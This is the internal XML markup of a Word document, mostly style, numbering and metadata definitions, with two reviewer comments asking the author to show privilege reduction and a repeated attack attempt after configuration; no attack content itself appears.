    <w:p w14:paraId="61098FCB" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="59248205" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="670E3C0F" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="600D7F2C" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="7DB19BC9" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="53164B14" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:sectPr w:rsidR="001D3AB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7assan 9" w:date="2026-04-17T17:18:00Z" w:initials="79">
    <w:p w14:paraId="6170FC37" w14:textId="77777777" w:rsidR="005E3FAC" w:rsidRDefault="005E3FAC" w:rsidP="005E3FAC">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Show the reduction of privliges.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="7assan 9" w:date="2026-04-17T17:19:00Z" w:initials="79">
    <w:p w14:paraId="621D98FD" w14:textId="77777777" w:rsidR="00CA734A" w:rsidRDefault="00CA734A" w:rsidP="00CA734A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Show the attempt of the same attack after configuration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70FC37" w15:done="1"/>
  <w15:commentEx w15:paraId="621D98F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F37755" w16cex:dateUtc="2026-04-17T14:18:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="017C372B" w16cex:dateUtc="2026-04-17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70FC37" w16cid:durableId="10F37755"/>
  <w16cid:commentId w16cid:paraId="621D98FD" w16cid:durableId="017C37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326"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4044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4FAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5B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1FBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EECA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A2FC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DA8F5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709FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50F2A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1636A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BC8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145BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED823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04B1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B71E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D43F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8D0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651EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CED8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B47E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A85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C38FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E10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AC1083"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="471ED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43A63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47588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A76E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34C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E2C64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58F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506F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4B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E520E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="596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3474B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78D6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B62C55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8D0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A262C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DC6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A7371"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A44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800171"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A42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80C1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C1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C0ABB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93D6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460294"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48BC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033EDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E0655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C25687"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A960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B09C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="491E8A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F08219C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F3AD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656247">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2035300207">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1554392657">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="362483575">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1824153654">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1384989444">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="755171464">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="336927133">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2131585085">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="109669329">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2054888118">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="798062656">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="402875350">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1557667767">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1943609889">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1158569549">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1502574912">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1085884072">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="894000343">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1924677302">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="114715855">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1187868585">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="659116442">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1254390627">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="2129740216">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="289020166">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1826699699">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1113397574">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1893686909">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="24716114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7assan 9">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="27249965182622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ABE"/>
    <w:rsid w:val="00034196"/>
    <w:rsid w:val="00040E5A"/>
    <w:rsid w:val="00081012"/>
    <w:rsid w:val="000D6833"/>
    <w:rsid w:val="001005CC"/>
    <w:rsid w:val="00143850"/>
    <w:rsid w:val="00174765"/>
    <w:rsid w:val="00174FC4"/>
    <w:rsid w:val="001D3ABE"/>
    <w:rsid w:val="002762F0"/>
    <w:rsid w:val="002B3D94"/>
    <w:rsid w:val="002F517F"/>
    <w:rsid w:val="00300EA8"/>
    <w:rsid w:val="00393D8A"/>
    <w:rsid w:val="003C6D74"/>
    <w:rsid w:val="004028B0"/>
    <w:rsid w:val="00406C81"/>
    <w:rsid w:val="00427CB3"/>
    <w:rsid w:val="00442D1A"/>
    <w:rsid w:val="0047354A"/>
    <w:rsid w:val="00474469"/>
    <w:rsid w:val="00496DB7"/>
    <w:rsid w:val="004A3F69"/>
    <w:rsid w:val="004B6518"/>
    <w:rsid w:val="004C3A6A"/>
    <w:rsid w:val="004D2458"/>
    <w:rsid w:val="004F02D4"/>
    <w:rsid w:val="004F4317"/>
    <w:rsid w:val="00504A5B"/>
    <w:rsid w:val="005445D3"/>
    <w:rsid w:val="00560540"/>
    <w:rsid w:val="00590E5A"/>
    <w:rsid w:val="005C25CF"/>
    <w:rsid w:val="005C5F5A"/>
    <w:rsid w:val="005D2FC9"/>
    <w:rsid w:val="005E3FAC"/>
    <w:rsid w:val="005F4CD8"/>
    <w:rsid w:val="0061341B"/>
    <w:rsid w:val="006828C6"/>
    <w:rsid w:val="006B44EB"/>
    <w:rsid w:val="006C423C"/>
    <w:rsid w:val="006F4F4F"/>
    <w:rsid w:val="007113B3"/>
    <w:rsid w:val="007303C1"/>
    <w:rsid w:val="0074032D"/>
    <w:rsid w:val="0074238B"/>
    <w:rsid w:val="00760521"/>
    <w:rsid w:val="00762146"/>
    <w:rsid w:val="007624C2"/>
    <w:rsid w:val="007C1646"/>
    <w:rsid w:val="007D58B6"/>
    <w:rsid w:val="00812602"/>
    <w:rsid w:val="008325FD"/>
    <w:rsid w:val="00843BD3"/>
    <w:rsid w:val="008610BE"/>
    <w:rsid w:val="00870D26"/>
    <w:rsid w:val="00872BC5"/>
    <w:rsid w:val="008D01AC"/>
    <w:rsid w:val="00941777"/>
    <w:rsid w:val="00966156"/>
    <w:rsid w:val="00980274"/>
    <w:rsid w:val="00982DCD"/>
    <w:rsid w:val="009B62DD"/>
    <w:rsid w:val="00A0101B"/>
    <w:rsid w:val="00A421AC"/>
    <w:rsid w:val="00A94BC3"/>
    <w:rsid w:val="00AA22E8"/>
    <w:rsid w:val="00AE17CD"/>
    <w:rsid w:val="00AF423B"/>
    <w:rsid w:val="00B30593"/>
    <w:rsid w:val="00BC5C22"/>
    <w:rsid w:val="00BD7B00"/>
    <w:rsid w:val="00BE089E"/>
    <w:rsid w:val="00BF2617"/>
    <w:rsid w:val="00BF4139"/>
    <w:rsid w:val="00BF573E"/>
    <w:rsid w:val="00C0661C"/>
    <w:rsid w:val="00C54D07"/>
    <w:rsid w:val="00CA734A"/>
    <w:rsid w:val="00D07FF9"/>
    <w:rsid w:val="00D12A8B"/>
    <w:rsid w:val="00D257CB"/>
    <w:rsid w:val="00D408CD"/>
    <w:rsid w:val="00D420CE"/>
    <w:rsid w:val="00D50532"/>
    <w:rsid w:val="00DD17C6"/>
    <w:rsid w:val="00DD7B85"/>
    <w:rsid w:val="00DE3BE7"/>
    <w:rsid w:val="00E14026"/>
    <w:rsid w:val="00E169E5"/>
    <w:rsid w:val="00EA4268"/>
    <w:rsid w:val="00EC673E"/>
    <w:rsid w:val="00EF13BF"/>
    <w:rsid w:val="00F15137"/>
    <w:rsid w:val="00F23850"/>
    <w:rsid w:val="00F24B84"/>
    <w:rsid w:val="00F250E5"/>
    <w:rsid w:val="00FC719C"/>
    <w:rsid w:val="00FF0F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83A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3F54E719-E929-4605-A9B2-3A9549BC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E5A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001D3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ABE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001D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ABE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="001D3ABE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001D3ABE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="001D3ABE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="001D3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ABE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="001D3ABE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00300EA8"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00300EA8"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00300EA8"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00300EA8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00300E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7.png"/><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1.png"/><Relationship Id="rId20" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xm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comments" Target="comments.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microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml"/><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70C37-9047-4903-A2C0-142D6605F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21</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7assan 9</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>7assan 9</cp:lastModifiedBy>
  <cp:revision>78</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-10T07:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T10:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>